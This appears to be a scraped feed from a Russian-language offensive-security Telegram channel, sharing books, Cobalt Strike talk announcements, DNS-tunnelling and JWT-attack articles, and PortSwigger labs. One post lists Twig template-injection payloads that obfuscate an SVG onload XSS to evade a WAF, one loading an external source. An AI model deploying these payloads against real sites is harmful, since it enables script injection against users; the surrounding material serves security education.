RESOLUTE ATTACK
6.45K subscribers
207 photos
39 videos
84 files
297 links
⚡️RESOLUTE ATTACK - Компания по информационной безопасности

YouTube - https://www.youtube.com/@RESOLUTE-ATTACK

Chat - @RESOLUTECHAT

Web Site - www.resolute-attack.com

Обратная связь - @ResoluteAttack_Bot
Download Telegram
🚀Malware Analysis

#Разное #Roadmap
👍8🔥1
Stepyrev_Daniil_Fedorovich_Pre_graduate_practice_2022_text.pdf
246.2 KB
Использование уязвимостей ОС Windows
для повышения привилегий пользователя в
цифровой криминалистике

Санкт-Петербург
2022

#Разное #Привилегии
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍71
Кибербезопасность_стратегии_атак_и_обороны_Юрий_Диогенес,_Эрдаль.pdf
18.7 MB
💻 Кибербезопасность:
стратегии атак и обороны

Безопасность инфраструктуры
с использованием тактик Красной и Синей команд

Очень годное чтиво на ночь 🔥

#Разное #Безопасноcть
Please open Telegram to view this post
VIEW IN TELEGRAM
👍136🕊4👨‍💻3
SSTI to bypass WAF

Обход WAF с внедрением шаблонов на стороне сервера в тех случаях, когда RCE невозможен

{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}

{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}

{{'<svg o'}}{{'nload=al'}}{{'ert`1`>'}}

{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}

{{'>)1(trela=daolno gvs<'|reverse|raw}}

{{'<embe'}}{{'d src=//14.rs>'}}

#Обход
5🕊3👍2🔥2
💧Cobalt strike | Тактика современных угроз

Уже послезавтра!
В 20:00 (мск)

В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".

Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2

Спикер - @e7_redteam

Смотри на нашем ютуб канале - тык
Please open Telegram to view this post
VIEW IN TELEGRAM
75🔥3👍2👨‍💻2🕊1
Please open Telegram to view this post
VIEW IN TELEGRAM
👍83😈2
Завтра будет ядерная статья 😤
Please open Telegram to view this post
VIEW IN TELEGRAM
😈207👍4🤩3
🐍 DNS-туннелирование. Dnscat2.

DNS это базовый протокол, без которого современный интернет даже и вообразить нельзя. Он представляет собой справочники открытой информации из доменных имен хостов и ip адресов.

Упрощенная схема DNS запросов выглядит следующим образом, но реальный DNS трекинг куда сложнее

Читать

#Уязвимости #Инструменты #Сети
Please open Telegram to view this post
VIEW IN TELEGRAM
96👍3🔥2😈2🕊1
❗️ Та самая, ядерная статья от нашего админа и спеца - @MGMx80
Please open Telegram to view this post
VIEW IN TELEGRAM
👍 Prototype pollution

На PortSwigger.net добавились новые таски. Они связаны с Prototype pollution. Это уязвимость JavaScript, которая позволяет злоумышленнику добавлять произвольные свойства к глобальным прототипам.

Таски, кроме ручной работы, основаны на использовании DOM Invader (новой утилитой Burp Suite)

EAGER7

#Лаборатории #Уязвимости #Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍122👨‍💻2
.: - Покопать ли нам винду? 🫥

Сегодня кстати доклад по Cobalt Strike
Мы создали подобие AD, где будем показывать всё на практике
Please open Telegram to view this post
VIEW IN TELEGRAM
👍166🔥1
💧Cobalt strike | Тактика современных угроз

Уже через
час!

В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".

Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2

Спикер - @e7_redteam

https://www.youtube.com/watch?v=eXlRJtY82Rg

#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥103👍2🤩2👨‍💻2
А если в CTF будут денежные призы?)
🔥22👍3👨‍💻3
Какая же тут битва 🔥
🔥185🤩2
This media is not supported in your browser
VIEW IN TELEGRAM
🦸‍♂️ Немного вам из нашей внутренней кухни

Войс в исполнении E1TEX 🔥😂
Please open Telegram to view this post
VIEW IN TELEGRAM
🕊87🤣7😍3🔥1🤩1
Делать ли E1TEX кавер?
Anonymous Poll
81%
Да
19%
Нет
🔥12
📯 JWT-Атаки

Привет, Гайз, разбавим немного серию статей про повышение привилегий в ОС Линукс другой тематикой. Сегодня с Вами разберем достаточно известный тип атак на клиентскую часть приложения - JWT-атаки

Читать

#Разное #Привилегии
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥95👍5🕊1
💔 Немного вам материала по сетям
Please open Telegram to view this post
VIEW IN TELEGRAM
143👍3